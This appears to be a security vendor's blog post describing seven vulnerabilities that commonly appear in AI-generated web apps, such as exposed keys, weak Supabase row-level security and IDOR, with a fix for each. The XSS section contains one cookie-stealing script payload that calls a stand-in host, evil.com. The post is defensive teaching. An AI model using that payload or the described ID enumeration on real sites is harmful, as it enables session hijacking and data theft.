Skip to main content
All posts
AI-securityvulnerabilitiescursorlovableboltv0

The 7 Most Common Vulnerabilities in AI-Generated Code

April 14, 202611 min read

Multiple studies converge on the same number: somewhere between 45% and 62% of AI-generated code contains security vulnerabilities. A Veracode analysis put it at 45%. The Cloud Security Alliance measured 62%. Georgia Tech's Vibe Security Radar tracked 35 CVEs in a single month attributable to AI coding tools, with researchers estimating the true count is 5-10x higher.

These are not random bugs. The same 7 vulnerability types appear across every AI coding tool we have tested. Here is what they are, why AI produces them, and how to fix each one.

1. Exposed Secrets in Client-Side Code

How often: Found in approximately 40% of Supabase-based apps we scan.

Why AI does this: When you tell Cursor "connect to my database," it uses the fastest path: put the connection credentials in the file that needs them. It does not reason about which files get shipped to the browser. The NEXT_PUBLIC_ prefix in Next.js is an easy trap — AI uses it for every environment variable because it makes the code "work."

Real example: We routinely find Supabase service_role keys, Stripe sk_live_ keys, and OpenAI API keys in client bundles. One app we scanned had all three exposed. The service role key grants full database access, bypassing all RLS policies. The Stripe key allows charging any customer. The OpenAI key can be used to run up thousands of dollars in API costs.

The fix: Audit every environment variable. If it starts with NEXT_PUBLIC_, it is public. Only your Supabase anon key and project URL should be public. Everything else goes server-side. Then rotate every key that was ever in client code — once exposed, assume it has been captured.

2. Missing or Broken Row Level Security

How often: Found in approximately 60% of Supabase apps. The most common critical vulnerability.

Why AI does this: Supabase ships with RLS disabled by default. AI tools enable it when told to, but the policies they write are often wrong. The three failure patterns: USING(true) policies that grant access to every role, UPDATE policies without WITH CHECK that enable privilege escalation, and tables with RLS enabled but zero policies.

Real example: A fintech app we scanned had RLS enabled on its transactions table with a policy: USING(auth.uid() IS NOT NULL). This means any authenticated user can read every transaction in the system — not just their own. The intended policy should have been USING(auth.uid() = user_id).

The fix: For every table, write explicit policies that match rows to the requesting user via auth.uid(). Every UPDATE policy needs WITH CHECK to prevent column tampering. Test by querying as user A and verifying you cannot see user B's data.

3. Unprotected API Routes

How often: Found in approximately 50% of apps. Especially common in Next.js.

Why AI does this: When you say "create an admin dashboard," AI builds the pages and the API routes. It focuses on making the feature work, not on who can access it. The result: API routes at /api/admin/users or /api/admin/delete that anyone can call without authentication.

Real example: A SaaS app had an /api/admin/export-users endpoint that returned a CSV of all user emails, names, and subscription status. No auth check. No rate limiting. Accessible to anyone who guessed the URL.

The fix: Every API route that returns or modifies data must check authentication in the first 3 lines. In Next.js, create a shared auth helper and call it at the top of every route handler. Better yet, use middleware to protect route groups.

4. SQL Injection Through Raw Queries

How often: Found in approximately 15% of apps. More common in Python backends and custom API routes.

Why AI does this: AI tools sometimes generate raw SQL queries with string interpolation instead of parameterized queries. This is especially common when the prompt asks for complex queries that the ORM does not handle well, or when the AI reaches for supabase.rpc() with user-supplied parameters.

Real example: A search feature with SELECT * FROM products WHERE name LIKE '%' || $1 || '%' looks safe, but if the RPC function builds the query with string concatenation internally, an attacker can inject arbitrary SQL. We have seen AI generate Supabase RPC functions that concatenate user input directly into SQL strings.

The fix: Always use parameterized queries. In Supabase, use the client library's built-in filtering (.eq(), .like(), etc.) instead of raw SQL. If you must use RPC functions, ensure the function body uses $1, $2 parameters, never string concatenation.

5. Cross-Site Scripting (XSS) via dangerouslySetInnerHTML

How often: Found in approximately 25% of React/Next.js apps.

Why AI does this: When you ask AI to display user-generated content (comments, profiles, messages), it often reaches for dangerouslySetInnerHTML because it renders HTML correctly. The name literally warns you, but AI does not read the name — it just knows this function produces the expected output.

Real example: A community app rendered user comments with dangerouslySetInnerHTML={{ __html: comment.body }}. An attacker could submit a comment containing <script>fetch('https://evil.com/steal?cookie='+document.cookie)</script> and steal session cookies from every user who viewed the page.

The fix: Use a sanitization library like DOMPurify before rendering any user content. Or better yet, store content as plain text and render with React's default escaping. Only use dangerouslySetInnerHTML for content you fully control (like CMS-authored blog posts from your own team).

6. Insecure Direct Object References (IDOR)

How often: Found in approximately 35% of apps. The most underestimated vulnerability.

Why AI does this: AI generates routes like /api/orders/[id] that fetch the order by ID. It does not check whether the requesting user owns that order. If user A knows (or guesses) user B's order ID, they can read the full order details.

Real example: An e-commerce app used sequential integer IDs for orders. Endpoint: /api/orders/1234. No ownership check. An attacker could enumerate every order in the system by incrementing the ID: /api/orders/1235, /api/orders/1236, and so on.

The fix: Two defenses. First, use UUIDs instead of sequential IDs so they cannot be guessed. Second, always verify ownership: WHERE id = $orderId AND user_id = $currentUser. Both defenses together — UUIDs alone are not sufficient because they can still leak through logs or referrer headers.

7. Missing Rate Limiting on Expensive Operations

How often: Found in approximately 70% of apps. Almost universal.

Why AI does this: Rate limiting is a cross-cutting concern. It does not naturally emerge when you prompt "build me a login page" or "add a search feature." AI builds the feature you asked for. It does not think about what happens when someone calls that feature 10,000 times per second.

Real example: An app with an /api/ai-generate endpoint that called OpenAI's API. No rate limiting, no auth check. An attacker found the endpoint, wrote a script, and ran up $2,300 in API charges in 4 hours before the developer noticed.

The fix: Add rate limiting to every endpoint that is expensive (API calls, database writes, email sending) or sensitive (login, password reset, signup). Upstash Redis with their @upstash/ratelimit package works on Vercel with zero configuration. 5 requests per minute for login. 60 per minute for general API routes. Adjust based on your actual usage patterns.

Why AI Keeps Making These Mistakes

AI coding tools optimize for one thing: making the code work. Security is a constraint that only matters in adversarial conditions — conditions the AI never experiences during code generation. It has never been hacked. It does not know what it feels like to find your database dumped on Pastebin.

This is not a temporary problem that will be solved by better models. Security requires reasoning about absent things (what checks are missing?), adversarial intent (how would someone misuse this?), and system-level context (how does this endpoint interact with the auth layer?). These are fundamentally different from "make this feature work."

The fix is not to stop using AI coding tools. The fix is to test what they produce.

Frequently Asked Questions

Are some AI coding tools more secure than others?

Marginally. Lovable recently added built-in security scanning (via Aikido). Claude tends to produce more secure code than GPT-4 in our testing, particularly around RLS policies. But none of them are secure by default, and all of them produce code that fails multiple checks on our scanner.

Does using TypeScript help with security?

TypeScript catches type errors, not security vulnerabilities. A perfectly typed function can still have SQL injection, broken auth, and exposed secrets. Type safety is about correctness, not security.

How do I know if my AI-generated code has already been exploited?

Check your Supabase logs for unusual query patterns (many reads from a single IP, access to tables the frontend should not touch). Check your Stripe dashboard for unexpected charges. Check your OpenAI usage for spikes. If you had exposed secrets, assume they were found — rotate them and audit your logs.

Related reading

Scan your app free

Paste a URL, get a letter grade and Cursor-ready fixes in 3 minutes. No signup required.

Start Free Scan